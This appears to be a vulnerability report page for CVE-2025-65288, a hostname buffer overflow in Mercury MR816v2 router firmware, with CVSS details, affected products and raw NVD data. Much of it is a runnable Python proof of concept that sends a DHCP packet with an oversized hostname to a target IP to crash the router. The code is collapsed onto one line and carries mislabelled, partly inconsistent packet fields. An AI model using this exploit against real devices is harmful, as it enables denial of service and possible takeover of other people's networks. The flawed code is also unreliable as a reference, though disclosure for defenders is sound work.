Security Vulnerability Report
中文
CVE-2025-65288 CVSS 6.5 MEDIUM

CVE-2025-65288

Published: 2025-12-09 17:15:56
Last Modified: 2025-12-12 14:32:55
Source: [email protected]

Description

A buffer overflow in the Mercury MR816v2 (081C3114 4.8.7 Build 110427 Rel 36550n) occurs when the device accepts and stores excessively long hostnames from LAN hosts without proper length validation. The affected code performs unchecked copies/concatenations into fixed-size buffers. A crafted long hostname can overflow the buffer, cause a crash (DoS) and potentially enabling remote code execution.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:mercurycom:mr816_firmware:081c3114_4.8.7:build_110427:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:mercurycom:mr816:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
Mercury MR816v2 081C3114 4.8.7 Build 110427 Rel 36550n

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-65288 PoC - Mercury MR816v2 Buffer Overflow via Long Hostname # This PoC demonstrates sending a crafted DHCP request with an oversized hostname import socket import struct import sys def create_dhcp_discover_with_long_hostname(hostname_length=512): """Create a DHCP Discover packet with an oversized hostname field""" # Construct oversized hostname (triggering buffer overflow) long_hostname = b'A' * hostname_length # 512 bytes of 'A' # DHCP Message Type: Discover (1) dhcp_message = bytearray() dhcp_message.append(1) # op: BOOTREQUEST dhcp_message.append(1) # htype: Ethernet dhcp_message.append(6) # hlen: Ethernet MAC address length dhcp_message.append(0) # hops: 0 dhcp_message.extend(b'\x00' * 4) # xid: transaction ID dhcp_message.extend(b'\x00' * 2) # secs dhcp_message.extend(b'\x00' * 2) # flags dhcp_message.extend(b'\x00' * 4) # ciaddr dhcp_message.extend(b'\x00' * 4) # yiaddr dhcp_message.extend(b'\x00' * 4) # siaddr dhcp_message.extend(b'\x00' * 4) # giaddr dhcp_message.extend(b'\x00' * 16) # chaddr (MAC) dhcp_message.extend(b'\x00' * 64) # sname (empty) dhcp_message.extend(b'\x00' * 128) # file (empty) # Magic cookie dhcp_message.extend(b'\x63\x82\x53\x63') # Option 12: Host Name (with oversized value) dhcp_message.append(12) # Option 53: DHCP Message Type dhcp_message.append(len(long_hostname)) dhcp_message.extend(long_hostname) # End option dhcp_message.append(255) return bytes(dhcp_message) def send_exploit(target_ip='192.168.1.1', hostname_length=512): """Send the exploit packet to target device""" sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) packet = create_dhcp_discover_with_long_hostname(hostname_length) print(f"[*] Sending DHCP Discover with {hostname_length} byte hostname...") print(f"[*] Target: {target_ip}:67") try: sock.sendto(packet, (target_ip, 67)) print("[+] Packet sent successfully") print("[*] The device should now process the oversized hostname") except Exception as e: print(f"[-] Error: {e}") finally: sock.close() if __name__ == '__main__': print("CVE-2025-65288 PoC - Mercury MR816v2 Buffer Overflow") print("=" * 60) target = sys.argv[1] if len(sys.argv) > 1 else '192.168.1.1' length = int(sys.argv[2]) if len(sys.argv) > 2 else 512 send_exploit(target, length)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65288", "sourceIdentifier": "[email protected]", "published": "2025-12-09T17:15:55.603", "lastModified": "2025-12-12T14:32:55.303", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A buffer overflow in the Mercury MR816v2 (081C3114 4.8.7 Build 110427 Rel 36550n) occurs when the device accepts and stores excessively long hostnames from LAN hosts without proper length validation. The affected code performs unchecked copies/concatenations into fixed-size buffers. A crafted long hostname can overflow the buffer, cause a crash (DoS) and potentially enabling remote code execution."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:mercurycom:mr816_firmware:081c3114_4.8.7:build_110427:*:*:*:*:*:*", "matchCriteriaId": "E679E997-793D-4C5A-AD18-DB222D262425"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:mercurycom:mr816:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "360C10B2-75DF-445F-B772-0A99A82E1D91"}]}]}], "references": [{"url": "https://damiri.fr/en/cve/CVE-2025-65288", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.